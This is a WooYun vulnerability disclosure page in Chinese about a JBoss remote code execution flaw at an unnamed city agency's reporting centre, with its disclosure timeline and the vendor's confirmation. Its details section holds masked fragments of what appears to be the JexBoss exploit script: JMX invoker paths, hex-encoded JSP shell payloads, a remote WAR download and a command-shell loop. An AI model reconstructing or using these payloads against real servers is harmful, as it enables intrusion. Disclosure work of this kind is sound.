当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110645

漏洞标题:某市敏感单位网络报*中心JBoss远程代码执行漏洞

相关厂商:某市敏感单位

漏洞作者: 路人甲

提交时间:2015-05-07 16:04

修复时间:2015-06-21 16:24

公开时间:2015-06-21 16:24

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-07: 厂商已经确认,细节仅向厂商公开
2015-05-17: 细节向核心白帽子及相关领域专家公开
2015-05-27: 细节向普通白帽子公开
2015-06-06: 细节向实习白帽子公开
2015-06-21: 细节向公众公开

简要描述:

某市敏感单位网络报*中心JBoss远程代码执行漏洞

详细说明:

mask 区域
1.http://**.**.**
2.http://**.**.**/invoker/JMXInvokerServlet_
3.://**.**.**//118.192.4.79:8888/</code>_
*****, 6 - Remote Comman*****
*****到的poc&l*****
*****lib, sys, ur*****
*****mport u*****
*****
*****
*****x1b[91m*****
*****\033[31*****
*****\033[94*****
*****;\033[3*****
*****\033[1m*****
*****9;\033[*****
*****\033[0m*****
*****
*****
*****st(ur*****
4.://**.**.**//")_
*****: #foi forne*****
*****].split(&quo*****
*****lse*****
*****.split(&quo*****
***** *****
*****ocol(u*****
5.://**.**.**//")_
*****== "*****
*****"ht*****
*****lse*****
*****"ht*****
*****
*****
*****rt(ur*****
*****.split(&qu*****
*****token)*****
*****urn to*****
*****l) == "*****
*****eturn*****
*****lse*****
*****eturn*****
***** *****
*****ection*****
*****l) == &quot*****
*****nection(getHost(*****
*****lse*****
*****ection(getHost(u*****
***** *****
*****
*****
*****ully(url*****
*****esult*****
*****e.slee*****
*****getConne*****
*****"GET&q*****
*****nn.getresp*****
*****result*****
***** conn.*****
***** time.*****
*****= getConn*****
*****t("GET&*****
*****conn.getres*****
***** conn.*****
*****urn re*****
*****
*****
*****Vul(u*****
***** *****
*****Checking Host: *****
***** *****
*****tmlAdaptor?action=inspectMBean&am*****
***** : "/web-con*****
*****ot; : "/invoker*****
*****
*****
*****n path*****
***** *****
*****; * Checking %s:*****
*****= getConn*****
*****t("HEAD*****
*****onn.getrespo*****
*****== 200 or pa*****
*****quot;[ VULNERAB*****
***** GREEN + &qu*****
***** conn.*****
***** exc*****
*****rred while contaction th*****
***** path[*****
***** *****
*****urn *****
*****
*****
*****it(url,*****
***** *****
*****ry: tested and wor*****
***** tested and wor*****
***** tested a*****
*****ry: tested and wor*****
***** *****
***** exploit code to %s*****
*****ult *****
*****t;jmx-cons*****
*****mxConsoleFile*****
*****200 and res*****
*****oitJmxConsole*****
*****uot;web-co*****
*****oitWebConso*****
*****JMXInvokerSe*****
*****MXInvokerFile*****
*****
*****
*****200 or re*****
*****yed code! Starting comman*****
*****_http(u*****
*****lse*****
*****w automatically. Exploitation*****
*****ing for 7 seconds*****
*****e.slee*****
*****
*****
*****p(url, *****
*****ot; or type == &qu*****
*****bossass/jbos*****
*****JMXInvokerSe*****
*****invoker/shelli*****
*****
*****
*****tConnec*****
*****uot;GET&qu*****
*****n.cl*****
*****sleep*****
*****"*****
*****cle*****
*****- - - LOL - - - - - - - - -*****
*****uot;+url+&quo*****
*****nt" : &quo*****
*****#039;cat /etc/issue&*****
*****getConne*****
*****({"ppp&*****
*****ot;, path+cmd, *****
*****esponse().read().spl*****
*****nt r*****
***** *****
*****hil*****
*****ands or \"exit*****
*****quot;Shell&g*****
*****print*****
***** "ex*****
***** br*****
*****getConne*****
*****({"ppp&*****
*****ot;, path+cmd, *****
*****conn.get*****
*****.status *****
*****cting the commando she*****
***** conn.*****
***** co*****
*****t = &qu*****
***** *****
*****d().split(&quot*****
***** exc*****
*****cting the commando she*****
*****ion occurred process*****
*****d \"%s\". " %*****
***** print *****
*****onn.c*****
*****
*****
*****soleMainD*****
*****nDepl*****
*****n jboss5 (b*****
*****ll in*****
*****ole/Html*****
6.://**.**.**//www.joaomatosf.com/rnp/jbossass.war"_
*****r?action=invokeOp&n*****
*****&methodIndex=1*****
*****t will force the server *****
***** available on: *****
*****tConnec*****
*****t;HEAD&quot*****
*****.getrespo*****
*****n.cl*****
*****quot;/jbossass/jb*****
*****
*****
*****leFileRepo*****
*****entFileRe*****
*****d work in *****
*****ot work i*****
***** shel*****
*****nsole/Htm*****
*****%65%20%69%6D%70%6F%72*****
*****%2C%6A%61%76%61%2E%69*****
*****%69%66%20%28%72%65%71*****
*****%74%65%72%28%22%70%70*****
*****%20%72%65%71%75%65%73*****
*****%73%65%72%2D%61%67%65*****
*****%65%78%62%6F%73%73%22*****
*****%20%3D%20%52%75%6E%74*****
*****%28%29%2E%65%78%65%63*****
*****%72%61%6D%65%74%65%72*****
*****%49%6E%70%75%74%53%74*****
*****%20%44%61%74%61%49%6E*****
*****%74%49%6E%70%75%74%53*****
*****%6E%67%20%64%69%73%72*****
*****%65%28%29%3B%20%77%68*****
*****%6E%75%6C%6C%20%29%20*****
*****%64%69%73%72%29%3B%20*****
*****4%4C%69%6E%65%28%29%3B*****
***** *****
*****action=invokeOpByName&amp*****
*****;methodName=store&argTy*****
*****a.lang.String&arg1=jbos*****
*****.String&arg3="+jsp+&quot*****
***** *****
*****getConne*****
*****uot;HEAD&quo*****
*****nn.getresp*****
*****onn.c*****
*****l, "/jbossas*****
***** *****
*****erFileRepo*****
*****work in j*****
*****y, shell*****
*****JMXInvok*****
*****x72\x00\x29\x6f\x72\x6*****
*****x6f\x63\x61\x74\x69\x6*****
*****x65\x64\x49\x6e\x76\x6*****
*****x41\x3e\xa4\xbe\x0c\x0*****
*****xc1\xd0\x53\x87\x73\x7*****
*****x67\x2e\x49\x6e\x74\x6*****
*****x38\x02\x00\x01\x49\x0*****
*****x6a\x61\x76\x61\x2e\x6*****
*****x86\xac\x95\x1d\x0b\x9*****
*****xe6\x73\x72\x00\x24\x6*****
*****x6e\x76\x6f\x63\x61\x7*****
*****x6c\x6c\x65\x64\x56\x6*****
*****x99\x0c\x00\x00\x78\x7*****
*****xed\x00\x05\x75\x72\x0*****
*****x6e\x67\x2e\x4f\x62\x6*****
*****x29\x6c\x02\x00\x00\x7*****
*****x61\x76\x61\x78\x2e\x6*****
*****x4f\x62\x6a\x65\x63\x7*****
*****x15\xcf\x03\x00\x00\x7*****
*****x61\x64\x6d\x69\x6e\x3*****
*****x70\x6c\x6f\x79\x6d\x6*****
*****x73\x69\x74\x6f\x72\x7*****
*****x71\x00\x7e\x00\x00\x0*****
*****x6c\x69\x6e\x76\x6f\x6*****
*****x68\x65\x6c\x6c\x69\x6*****
*****x73\x70\x74\x01\x79\x3*****
*****x70\x6f\x72\x74\x3d\x2*****
*****x2a\x2c\x6a\x61\x76\x6*****
*****x72\x65\x3e\x3c\x25\x6*****
*****x67\x65\x74\x50\x61\x7*****
*****x70\x22\x29\x20\x21\x3*****
*****x65\x71\x75\x65\x73\x7*****
*****x28\x22\x75\x73\x65\x7*****
*****x71\x75\x61\x6c\x73\x2*****
*****x20\x29\x20\x7b\x20\x5*****
*****x20\x52\x75\x6e\x74\x6*****
*****x69\x6d\x65\x28\x29\x2*****
*****x73\x74\x2e\x67\x65\x7*****
*****x22\x70\x70\x70\x22\x2*****
*****x75\x74\x53\x74\x72\x6*****
*****x65\x77\x20\x44\x61\x7*****
*****x61\x6d\x28\x70\x2e\x6*****
*****x65\x61\x6d\x28\x29\x2*****
*****x69\x73\x72\x20\x3d\x2*****
*****x6e\x65\x28\x29\x3b\x2*****
*****x73\x72\x20\x21\x3d\x2*****
*****x75\x74\x2e\x70\x72\x6*****
*****x3b\x20\x64\x69\x73\x7*****
*****x64\x4c\x69\x6e\x65\x2*****
*****x00\x11\x6a\x61\x76\x6*****
*****x65\x61\x6e\xcd\x20\x7*****
*****x05\x76\x61\x6c\x75\x6*****
*****x61\x76\x61\x2e\x6c\x6*****
*****xad\xd2\x56\xe7\xe9\x1*****
*****x05\x74\x00\x10\x6a\x6*****
*****x72\x69\x6e\x67\x71\x0*****
*****x7e\x00\x0f\x74\x00\x0*****
*****x87\x78\x77\x08\x00\x0*****
*****x6f\x72\x67\x2e\x6a\x6*****
*****x74\x69\x6f\x6e\x2e\x4*****
*****x65\x79\xb8\xfb\x72\x8*****
*****x6f\x72\x64\x69\x6e\x6*****
*****;\x00\x04\x*****
*****tConnec*****
*****java-serialized-object; class=or*****
*****t/html, image/gif, image*****
*****nvoker/JMXInvokerServl*****
*****conn.get*****
*****respons*****
*****lt == *****
*****; Retryi*****
*****onn.c*****
*****/invoker/JMXInvokerServ*****
*****= conn.ge*****
*****= respon*****
*****t("Failed*****
*****esult*****
*****n.cl*****
*****ot;/shellinvoker/s*****
***** *****
*****soleInvok*****
*****n jboss5 (b*****
*****y, shell*****
*****nsole/I*****
7.://**.**.**//www.joaomatosf.com/rnp/jbossass.war"_
*****;{:02x}".forma*****
*****t;\\x&qu*****
*****x05\x73\x72\x00\x2*****
*****x2e\x63\x6f\x6e\x73\x6*****
*****x52\x65\x6d\x6f\x74\x6*****
*****x61\x74\x69\x6f\x6e\xe*****
*****x4c\x00\x0a\x61\x63\x7*****
*****x4c\x6a\x61\x76\x61\x2*****
*****x67\x3b\x5b\x00\x06\x7*****
*****x6a\x61\x76\x61\x2f\x6*****
*****x3b\x5b\x00\x09\x73\x6*****
*****x5b\x4c\x6a\x61\x76\x6*****
*****x6e\x67\x3b\x4c\x00\x1*****
*****x63\x74\x4e\x61\x6d\x6*****
*****x6d\x61\x6e\x61\x67\x6*****
*****x74\x4e\x61\x6d\x65\x3*****
*****x79\x75\x72\x00\x13\x5*****
*****x2e\x4f\x62\x6a\x65\x6*****
*****x02\x00\x00\x78\x70\x0*****
***** "\*****
***** #*****
*****f\x2f\x77\x77\x77\x2e\x*****
*****x63\x6f\x6d\x2f\x72\x6*****
*****3\x61\x73\x73\x*****
***** *****
*****x75\x72\x00\*****
*****x2e\x6c\x61\x6e\x67\x2*****
*****xe7\xe9\x1d\x7b\x47\x0*****
*****x10\x6a\x61\x76\x61\x2*****
*****x67\x73\x72\x00\x1b\x6*****
*****x65\x6d\x65\x6e\x74\x2*****
*****x0f\x03\xa7\x1b\xeb\x6*****
*****x6a\x62\x6f\x73\x73\x2*****
*****x76\x69\x63\x65\x3d\x4*****
*****x6c\x6f\x79\x6*****
*****tConnec*****
*****-serialized-object; class=org.jbos*****
*****t/html, image/gif, image*****
*****/web-console/Invoker&*****
*****conn.get*****
*****respons*****
*****lt == *****
*****; Retryi*****
*****onn.c*****
*****uot;/web-console/Invo*****
*****= conn.ge*****
*****= respon*****
*****n.cl*****
***** "/jbossass*****
*****
*****
***** *****
*****lea*****
***** 'po*****
*****('cl*****
*****9;, 'nt'*****
*****('cl*****
*****
*****
*****Args(*****
*****gs[1].count(*****
***** host name or IP addre*****
8.://**.**.**//&
9.://**.**.**//%s"&
*****== 1 and args[1].coun*****
*****0, &quot*****
*****lse*****
*****;Parametro i*****
*****
*****
*****ner(*****
*****lea*****
*****boss verify and EXplo*****
***** *****
*****ilho Matos Figueired*****
*****tosf@gmail.com *****
***** *****
*****/github.com/joaomato*****
*****_____________________*****
*****
*****
*****r()*****
*****hon ve*****
*****n_info[*****
*****patible with versi*****
*****un it with version*****
*****ot; * Examp*****
10.://**.**.**//site.com\n\n"+ENDC )_
*****.exi*****
*****
*****
*****ck *****
***** checkArg*****
*****us =*****
*****ys.arg*****
*****us ==*****
*****n * Error: %*****
***** %s https://site.com.b*****
*****xit(s*****
*****us ==*****
11.://**.**.**//&
*****
*****
*****nerabi*****
***** check*****
*****
*****
*****exploi*****
*****b-console", &quot*****
*****200 or mapRe*****
*****utomated exploitation via \"*****
*****e a simple command shell to e*****
*****ue only if you have*****
*****O ? ").lower(*****
*****oExploit*****
*****
*****
*****e re*****
*****().count(2*****
*****ann*****
*****ntially compromise*****
*****- - - - - - - - - - - - - -*****
*****Recommendat*****
*****s and services that a*****
***** rm web-conso*****
***** rm http-invo*****
***** rm jmx-conso*****
*****x-invoker-adapto*****
***** rm admin-con*****
*****e proxy (eg. nginx*****
***** only via reverse proxy (*****
*****he directories \"deploy\&qu*****
*****; Referenc*****
12.://**.**.**//developer.jboss.org/wiki/SecureTheJmxConsole\n"_
13.://**.**.**//issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"_
***** "*****
*****ble, discard thi*****
*****- - - - - - - - - - - - - *****
*****es().count*****
*****t;\n\n * Res*****
*****lnerable to bugs test*****
*****
*****
*****os *****
*****, suggestions, up*****
14.://**.**.**//github.com/joaomatosf/jexboss\n"_
*****oaomatosf@gm*****
*****
*****
*****lt;/co*****

漏洞证明:

mask 区域
*****^*****
*****cbc0874e5dd206861d11d2.png*****
*****^安局网络报*****
*****32318ed65ae07fd69eb13b.png*****

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-07 16:22

厂商回复:

验证确认所描述的问题,已通知其修复。

最新状态:

暂无